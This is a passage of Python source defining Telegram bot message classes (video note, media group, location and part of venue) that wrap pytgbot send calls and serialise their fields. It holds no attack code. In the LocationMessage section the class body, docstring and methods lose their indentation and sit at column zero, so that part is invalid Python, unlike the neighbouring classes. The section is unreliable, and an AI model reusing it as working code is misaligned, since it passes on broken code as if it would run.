        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        array = super(VideoNoteMessage, self).to_array()
        # video_note is the only required field.
        if isinstance(self.video_note, InputFile):
            array['video_note'] = self.video_note.to_array()  # type InputFile
        elif isinstance(self.video_note, str):
            array['video_note'] = u(self.video_note)  # py2: type unicode, py3: type str
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int or None.')
            # end if
        # end if
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
            # end if
        # end if
        if self.duration is not None:
            array['duration'] = int(self.duration)  # type int
        # end if
        if self.length is not None:
            array['length'] = int(self.length)  # type int
        # end if
        if self.thumb is not None:
            if isinstance(self.thumb, InputFile):
                array['thumb'] = self.thumb.to_array()  # type InputFile
            elif isinstance(self.thumb, str):
                array['thumb'] = u(self.thumb)  # py2: type unicode, py3: type str
            else:
                raise TypeError('Unknown type, must be one of InputFile, str or None.')
            # end if
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is not None:
            if isinstance(self.reply_markup, InlineKeyboardMarkup):
                array['reply_markup'] = self.reply_markup.to_array()  # type InlineKeyboardMarkup
            elif isinstance(self.reply_markup, ReplyKeyboardMarkup):
                array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardMarkup
            elif isinstance(self.reply_markup, ReplyKeyboardRemove):
                array['reply_markup'] = self.reply_markup.to_array()  # type ReplyKeyboardRemove
            elif isinstance(self.reply_markup, ForceReply):
                array['reply_markup'] = self.reply_markup.to_array()  # type ForceReply
            else:
                raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
            # end if
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the VideoNoteMessage constructor.

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply
        from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
        from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
        data = super(VideoNoteMessage, VideoNoteMessage).validate_array(array)
        if isinstance(array.get('video_note'), InputFile):
            data['video_note'] = InputFile.from_array(array.get('video_note'))
        elif isinstance(array.get('video_note'), str):
            data['video_note'] = u(array.get('video_note'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
        data['length'] = int(array.get('length')) if array.get('length') is not None else None
        if array.get('thumb') is None:
            data['thumb'] = None
        elif isinstance(array.get('thumb'), InputFile):
            data['thumb'] = InputFile.from_array(array.get('thumb'))
        elif isinstance(array.get('thumb'), str):
            data['thumb'] = u(array.get('thumb'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str or None.')
        # end if
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new VideoNoteMessage from a given dictionary.

        :return: new VideoNoteMessage instance.
        :rtype: VideoNoteMessage
        """
        if not array:  # None or {}
            return None
        # end if
        data = VideoNoteMessage.validate_array(array)
        return VideoNoteMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(videonotemessage_instance)`
        """
        return "VideoNoteMessage(video_note={self.video_note!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, length={self.length!r}, thumb={self.thumb!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(videonotemessage_instance)`
        """
        return "VideoNoteMessage(video_note={self.video_note!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, duration={self.duration!r}, length={self.length!r}, thumb={self.thumb!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in videonotemessage_instance`
        """
        return (
            key in ["video_note", "receiver", "reply_id", "duration", "length", "thumb", "disable_notification", "allow_sending_without_reply", "reply_markup"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class VideoNoteMessage
class MediaGroupMessage(ReturnableMessageBase):
    """
    Use this method to send a group of photos, videos, documents or audios as an album. Documents and audio files can be only grouped in an album with messages of the same type. On success, an array of Messages that were sent is returned.

    https://core.telegram.org/bots/api#sendmediagroup

    Parameters:

    :param media: A JSON-serialized array describing messages to be sent, must include 2-10 items
    :type  media: list of pytgbot.api_types.sendable.input_media.InputMediaAudio | list of pytgbot.api_types.sendable.input_media.InputMediaDocument | list of pytgbot.api_types.sendable.input_media.InputMediaPhoto | list of pytgbot.api_types.sendable.input_media.InputMediaVideo

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param disable_notification: Sends messages silently. Users will receive a notification with no sound.
    :type  disable_notification: bool

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
    :type  allow_sending_without_reply: bool
    """

    def __init__(self, media, receiver=None, reply_id=DEFAULT_MESSAGE_ID, disable_notification=None, allow_sending_without_reply=None):
        """
        Create a MediaGroupMessage (an album of 2-10 media items) to be sent
        later via :meth:`actual_send`.

        See the class docstring for the full parameter documentation
        (mirrors https://core.telegram.org/bots/api#sendmediagroup).

        :param media: List of InputMediaAudio/InputMediaDocument/InputMediaPhoto/InputMediaVideo items.
        :type  media: list

        :param receiver: Optional chat_id override.
        :type  receiver: None | str|unicode | int

        :param reply_id: Optional reply_to_message_id override.
        :type  reply_id: DEFAULT_MESSAGE_ID | int | None

        :param disable_notification: Send the messages silently.
        :type  disable_notification: None | bool

        :param allow_sending_without_reply: Send even if the replied-to message is not found.
        :type  allow_sending_without_reply: None | bool
        """
        super(MediaGroupMessage, self).__init__()
        from pytgbot.api_types.sendable.input_media import InputMediaAudio
        from pytgbot.api_types.sendable.input_media import InputMediaDocument
        from pytgbot.api_types.sendable.input_media import InputMediaPhoto
        from pytgbot.api_types.sendable.input_media import InputMediaVideo
        # bugfix: the generated assert repeated `list` four times (one per
        # element type); a single `list` check is what was intended.
        assert_type_or_raise(media, list, parameter_name="media")
        self.media = media
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :rtype: PytgbotApiMessage
        """
        return sender.send_media_group(
            media=self.media,
            chat_id=self.receiver,
            reply_to_message_id=self.reply_id,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
        )
    # end def send

    def to_array(self):
        """
        Serializes this MediaGroupMessage to a dictionary.

        Bugfix: ``media`` is a *list* of InputMedia objects, so the previous
        ``isinstance(self.media, InputMediaAudio)`` checks could never match
        and this method always raised ``TypeError``. The list is now
        serialized as a whole. Optional fields which are ``None`` are omitted
        instead of crashing the exhausted ``isinstance`` chains.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        array = super(MediaGroupMessage, self).to_array()
        if isinstance(self.media, list):
            # serialize every InputMedia element of the album
            array['media'] = PytgbotApiBot._as_array(self.media)  # type list of InputMediaAudio | InputMediaDocument | InputMediaPhoto | InputMediaVideo
        else:
            raise TypeError('Unknown type, must be one of list of InputMediaAudio, InputMediaDocument, InputMediaPhoto, InputMediaVideo.')
        # end if
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int or None.')
            # end if
        # end if
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
            # end if
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the MediaGroupMessage constructor.

        Bugfix: the incoming ``media`` value is a *list*, so the previous
        ``isinstance(array.get('media'), InputMediaAudio)`` checks could never
        match and this method always raised ``TypeError``. Each element is now
        handled individually: already-deserialized InputMedia objects are kept
        as-is; plain dicts are dispatched on Telegram's ``type`` discriminator
        field ("audio"/"document"/"photo"/"video").

        :return: new array with valid values
        :rtype: dict
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.sendable.input_media import InputMediaAudio
        from pytgbot.api_types.sendable.input_media import InputMediaDocument
        from pytgbot.api_types.sendable.input_media import InputMediaPhoto
        from pytgbot.api_types.sendable.input_media import InputMediaVideo
        data = super(MediaGroupMessage, MediaGroupMessage).validate_array(array)
        media = array.get('media')
        if not isinstance(media, list):
            raise TypeError('Unknown type, must be one of list of InputMediaAudio, InputMediaDocument, InputMediaPhoto, InputMediaVideo.')
        # end if
        # map of Telegram's `type` discriminator value -> InputMedia subclass
        input_media_classes = {
            'audio': InputMediaAudio,
            'document': InputMediaDocument,
            'photo': InputMediaPhoto,
            'video': InputMediaVideo,
        }
        parsed_media = []
        for item in media:
            if isinstance(item, (InputMediaAudio, InputMediaDocument, InputMediaPhoto, InputMediaVideo)):
                # already a deserialized object - keep as-is.
                parsed_media.append(item)
            elif isinstance(item, dict) and item.get('type') in input_media_classes:
                # plain dict - dispatch on the `type` field.
                parsed_media.append(input_media_classes[item['type']].from_array(item))
            else:
                raise TypeError('Unknown type, must be one of InputMediaAudio, InputMediaDocument, InputMediaPhoto, InputMediaVideo.')
            # end if
        # end for
        data['media'] = parsed_media
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new MediaGroupMessage from a given dictionary.

        :return: new MediaGroupMessage instance.
        :rtype: MediaGroupMessage
        """
        if not array:  # None or {}
            return None
        # end if
        data = MediaGroupMessage.validate_array(array)
        return MediaGroupMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(mediagroupmessage_instance)`
        """
        return "MediaGroupMessage(media={self.media!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(mediagroupmessage_instance)`
        """
        return "MediaGroupMessage(media={self.media!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in mediagroupmessage_instance`
        """
        return (
            key in ["media", "receiver", "reply_id", "disable_notification", "allow_sending_without_reply"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class MediaGroupMessage
class LocationMessage(ReturnableMessageBase):
"""
Use this method to send point on the map. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendlocation
Parameters:
:param latitude: Latitude of the location
:type latitude: float
:param longitude: Longitude of the location
:type longitude: float
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param horizontal_accuracy: The radius of uncertainty for the location, measured in meters; 0-1500
:type horizontal_accuracy: float
:param live_period: Period in seconds for which the location will be updated (see Live Locations, should be between 60 and 86400.
:type live_period: int
:param heading: For live locations, a direction in which the user is moving, in degrees. Must be between 1 and 360 if specified.
:type heading: int
:param proximity_alert_radius: For live locations, a maximum distance for proximity alerts about approaching another chat member, in meters. Must be between 1 and 100000 if specified.
:type proximity_alert_radius: int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, latitude, longitude, receiver=None, reply_id=DEFAULT_MESSAGE_ID, horizontal_accuracy=None, live_period=None, heading=None, proximity_alert_radius=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send point on the map. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendlocation
Parameters:
:param latitude: Latitude of the location
:type latitude: float
:param longitude: Longitude of the location
:type longitude: float
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param horizontal_accuracy: The radius of uncertainty for the location, measured in meters; 0-1500
:type horizontal_accuracy: float
:param live_period: Period in seconds for which the location will be updated (see Live Locations, should be between 60 and 86400.
:type live_period: int
:param heading: For live locations, a direction in which the user is moving, in degrees. Must be between 1 and 360 if specified.
:type heading: int
:param proximity_alert_radius: For live locations, a maximum distance for proximity alerts about approaching another chat member, in meters. Must be between 1 and 100000 if specified.
:type proximity_alert_radius: int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
super(LocationMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import ForceReply
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
assert_type_or_raise(latitude, float, parameter_name="latitude")
self.latitude = latitude
assert_type_or_raise(longitude, float, parameter_name="longitude")
self.longitude = longitude
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(horizontal_accuracy, None, float, parameter_name="horizontal_accuracy")
self.horizontal_accuracy = horizontal_accuracy
assert_type_or_raise(live_period, None, int, parameter_name="live_period")
self.live_period = live_period
assert_type_or_raise(heading, None, int, parameter_name="heading")
self.heading = heading
assert_type_or_raise(proximity_alert_radius, None, int, parameter_name="proximity_alert_radius")
self.proximity_alert_radius = proximity_alert_radius
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
    """
    Deliver this location message through the given pytgbot instance.

    :param sender: The bot instance to send with.
    :type  sender: pytgbot.bot.Bot

    :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
    :type  ignore_reply: bool

    :rtype: PytgbotApiMessage
    """
    # NOTE(review): `ignore_reply` is accepted but not consulted here;
    # `reply_to_message_id` is always forwarded — presumably handled by the
    # caller/base class, confirm against ReturnableMessageBase.
    call_kwargs = dict(
        latitude=self.latitude,
        longitude=self.longitude,
        chat_id=self.receiver,
        reply_to_message_id=self.reply_id,
        horizontal_accuracy=self.horizontal_accuracy,
        live_period=self.live_period,
        heading=self.heading,
        proximity_alert_radius=self.proximity_alert_radius,
        disable_notification=self.disable_notification,
        allow_sending_without_reply=self.allow_sending_without_reply,
        reply_markup=self.reply_markup,
    )
    return sender.send_location(**call_kwargs)
# end def actual_send
def to_array(self):
    """
    Serializes this LocationMessage to a dictionary.

    Optional fields which are unset (None) are omitted from the result
    instead of crashing: the original code called `float(None)` for
    `horizontal_accuracy` and raised a TypeError for a None `receiver`
    or `reply_markup`, even though the constructor explicitly allows
    None for all of those.

    :return: dictionary representation of this object.
    :rtype: dict
    """
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    array = super(LocationMessage, self).to_array()
    # required fields
    array['latitude'] = float(self.latitude)  # type float
    array['longitude'] = float(self.longitude)  # type float
    # receiver: optional; None means "use the automatic receiver", so omit the key.
    if self.receiver is not None:
        if isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int.')
        # end if
    # end if
    # reply_id: optional; DEFAULT_MESSAGE_ID sentinel or a concrete message id.
    if self.reply_id is not None:
        if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
        # end if
    # end if
    # optional scalars: serialize only when set.
    if self.horizontal_accuracy is not None:
        array['horizontal_accuracy'] = float(self.horizontal_accuracy)  # type float
    # end if
    if self.live_period is not None:
        array['live_period'] = int(self.live_period)  # type int
    # end if
    if self.heading is not None:
        array['heading'] = int(self.heading)  # type int
    # end if
    if self.proximity_alert_radius is not None:
        array['proximity_alert_radius'] = int(self.proximity_alert_radius)  # type int
    # end if
    if self.disable_notification is not None:
        array['disable_notification'] = bool(self.disable_notification)  # type bool
    # end if
    if self.allow_sending_without_reply is not None:
        array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
    # end if
    # reply_markup: optional; any of the four keyboard/reply types serializes the same way.
    if self.reply_markup is not None:
        if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
            array['reply_markup'] = self.reply_markup.to_array()
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
        # end if
    # end if
    return array
# end def to_array
@staticmethod
def validate_array(array):
    """
    Builds a new array with valid values for the LocationMessage constructor.

    Maps wire keys back to constructor parameter names
    ('chat_id' -> 'receiver', 'reply_to_message_id' -> 'reply_id').

    :param array: serialized representation, as produced by `to_array()`.
    :type  array: dict

    :return: new array with valid values
    :rtype: dict
    """
    assert_type_or_raise(array, dict, parameter_name="array")
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    # let the base class pull out its own fields first
    data = super(LocationMessage, LocationMessage).validate_array(array)
    # required fields: raise (via float(None)) when missing
    data['latitude'] = float(array.get('latitude'))
    data['longitude'] = float(array.get('longitude'))
    # 'chat_id' -> receiver: optional, str or int
    if array.get('chat_id') is None:
        data['receiver'] = None
    elif isinstance(array.get('chat_id'), str):
        data['receiver'] = u(array.get('chat_id'))
    elif isinstance(array.get('chat_id'), int):
        data['receiver'] = int(array.get('chat_id'))
    else:
        raise TypeError('Unknown type, must be one of str, int or None.')
    # end if
    # 'reply_to_message_id' -> reply_id: optional, DEFAULT_MESSAGE_ID sentinel or int
    if array.get('reply_to_message_id') is None:
        data['reply_id'] = None
    elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
        # NOTE(review): this stores the DEFAULT_MESSAGE_ID sentinel itself and
        # discards the concrete wrapped value — presumably intentional, meaning
        # "reply to the triggering message"; confirm against the sentinel's
        # definition and ReturnableMessageBase before changing.
        data['reply_id'] = DEFAULT_MESSAGE_ID
    elif isinstance(array.get('reply_to_message_id'), int):
        data['reply_id'] = int(array.get('reply_to_message_id'))
    else:
        raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
    # end if
    # optional scalars: cast only when present, otherwise keep None
    data['horizontal_accuracy'] = float(array.get('horizontal_accuracy')) if array.get('horizontal_accuracy') is not None else None
    data['live_period'] = int(array.get('live_period')) if array.get('live_period') is not None else None
    data['heading'] = int(array.get('heading')) if array.get('heading') is not None else None
    data['proximity_alert_radius'] = int(array.get('proximity_alert_radius')) if array.get('proximity_alert_radius') is not None else None
    data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
    data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
    # 'reply_markup': optional; dispatch deserialization on the concrete keyboard type
    if array.get('reply_markup') is None:
        data['reply_markup'] = None
    elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
        data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
        data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
        data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ForceReply):
        data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
    else:
        raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
    # end if
    return data
# end def validate_array
@staticmethod
def from_array(array):
    """
    Deserialize a new LocationMessage from a given dictionary.

    :return: new LocationMessage instance.
    :rtype: LocationMessage
    """
    if not array:
        # covers both None and the empty dict
        return None
    # end if
    return LocationMessage(**LocationMessage.validate_array(array))
# end def from_array
def __str__(self):
    """
    Implements `str(locationmessage_instance)`
    """
    field_names = (
        "latitude", "longitude", "receiver", "reply_id", "horizontal_accuracy",
        "live_period", "heading", "proximity_alert_radius",
        "disable_notification", "allow_sending_without_reply", "reply_markup",
    )
    rendered = ", ".join(
        "{key}={value!r}".format(key=name, value=getattr(self, name))
        for name in field_names
    )
    return "LocationMessage({fields})".format(fields=rendered)
# end def __str__
def __repr__(self):
    """
    Implements `repr(locationmessage_instance)`
    """
    field_names = (
        "latitude", "longitude", "receiver", "reply_id", "horizontal_accuracy",
        "live_period", "heading", "proximity_alert_radius",
        "disable_notification", "allow_sending_without_reply", "reply_markup",
    )
    rendered = ", ".join(
        "{key}={value!r}".format(key=name, value=getattr(self, name))
        for name in field_names
    )
    return "LocationMessage({fields})".format(fields=rendered)
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in locationmessage_instance`
    """
    known_fields = (
        "latitude", "longitude", "receiver", "reply_id", "horizontal_accuracy",
        "live_period", "heading", "proximity_alert_radius",
        "disable_notification", "allow_sending_without_reply", "reply_markup",
    )
    if key not in known_fields:
        return False
    # end if
    # a field counts as "contained" only when present and truthy
    return hasattr(self, key) and bool(getattr(self, key, None))
# end def __contains__
# end class LocationMessage
class VenueMessage(ReturnableMessageBase):
    """
    Use this method to send information about a venue. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendvenue


    Parameters:

    :param latitude: Latitude of the venue
    :type  latitude: float

    :param longitude: Longitude of the venue
    :type  longitude: float

    :param title: Name of the venue
    :type  title: str|unicode

    :param address: Address of the venue
    :type  address: str|unicode


    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int

    :param foursquare_id: Foursquare identifier of the venue
    :type  foursquare_id: str|unicode

    :param foursquare_type: Foursquare type of the venue, if known. (For example, "arts_entertainment/default", "arts_entertainment/aquarium" or "food/icecream".)
    :type  foursquare_type: str|unicode

